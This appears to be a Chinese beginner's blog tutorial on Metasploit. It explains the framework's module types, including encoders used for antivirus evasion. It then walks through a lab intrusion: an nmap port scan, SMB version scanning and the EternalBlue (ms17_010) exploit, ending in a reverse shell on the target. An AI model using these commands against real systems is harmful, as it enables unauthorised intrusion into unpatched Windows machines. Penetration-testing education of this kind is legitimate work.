admin 管理员组

文章数量: 887007

文章目录

  • 一、Metasploit是什么?
    • 1、Auxiliaries(辅助模块)
    • 2、Exploit(渗透攻击模块)
    • 3、payload(攻击载荷模块)
    • 4、Post(后期渗透模块)
    • 5、Encoder(编码工具模块)
  • 二、Metasploit入侵步骤
    • 1.准备
    • 2.扫描端口
      • 1、直接在metasploit框架里使用nmap扫描端口
    • 3、查看版本
    • 4、查找对应利用漏洞模块
    • 5、shell

一、Metasploit是什么?

这里我简单介绍一下,方便你们小白了解(大佬直接跳过就行)
Metasploit框架是一个开源工具,旨在方便渗透测试,他是有ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。Metasploit可向后端模块提供多种用来控制测试的接口。Metasploit还有第三方接口,如nmap、SQLMap,可以直接在控制台使用。

1、Auxiliaries(辅助模块)

该模块主要作用是扫描、嗅探、指纹识别辅佐渗透。

2、Exploit(渗透攻击模块)

该模块里面包含许多类型模块,渗透测试者利用这些模块多漏洞进行利用

3、payload(攻击载荷模块)

该模块用于渗透攻击成功之后,在目标系统执行任意命令或者执行特点代码,总结来说就是建立目标机与攻击机稳定连接,可返回shell或进行注入

4、Post(后期渗透模块)

该模块主要用于在获取目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、实施跳板攻击。

5、Encoder(编码工具模块)

该工具在渗透测试中负责免杀,以防止被杀毒软件、防火墙、IDS及类似的安全软件检测出来

二、Metasploit入侵步骤

1.准备

1、首先你要确定两台主机在同一网段,并且能够ping通,这些我就不做演示了
2、更新软件
apt-get update
apt-get upgrade

3、msfconsole:打开metasploit

2.扫描端口

1、直接在metasploit框架里使用nmap扫描端口

你们也可以使用模块进行扫描

nmap -p 1-65535 -Pn 192.168.0.1

3、查看版本

1、search scanner/smb/smb_
2、use 7 -->show options -->set rhosts 192.168.0.1 -->run

4、查找对应利用漏洞模块

1、search exploit/windows/smb/

2、use exploit/windows/smb/ms17_010_eternalblue-->set rhost靶机ip-->set lhost 攻击机ip
我不知道你们这里的payload是不是主动配置的或者加上去的,我这由于以前玩过,不太清楚,如果不是或有问题请告知。


3、这里我们就成功了

5、shell

到了这一步就随便你们怎么玩了!
shell --> chcp 65001


注:如果我这里讲的有哪里不太详细、遗漏或错误,请及时告知。Thanks♪(・ω・)ノ!

本文标签: Metasploit